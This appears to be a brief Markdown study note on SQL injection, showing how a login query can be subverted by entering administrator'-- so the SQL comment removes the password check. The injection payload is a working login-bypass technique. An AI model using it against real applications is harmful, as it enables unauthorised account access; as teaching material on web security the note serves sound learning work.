16 lines
537 B
Markdown
16 lines
537 B
Markdown
|
|
||
|
## Subverting Application logic
|
||
|
|
||
|
Consider an application that lets users log in with a username and password. If a user submits the
|
||
|
username wiener and the password bluecheese, the application checks the credentials by performing the following SQL query:
|
||
|
|
||
|
```
|
||
|
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
|
||
|
```
|
||
|
|
||
|
Exploit
|
||
|
1. Log in as any user with SQL comment sequence -- to remove password from the WHERE clause
|
||
|
|
||
|
```
|
||
|
SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
|
||
|
```
|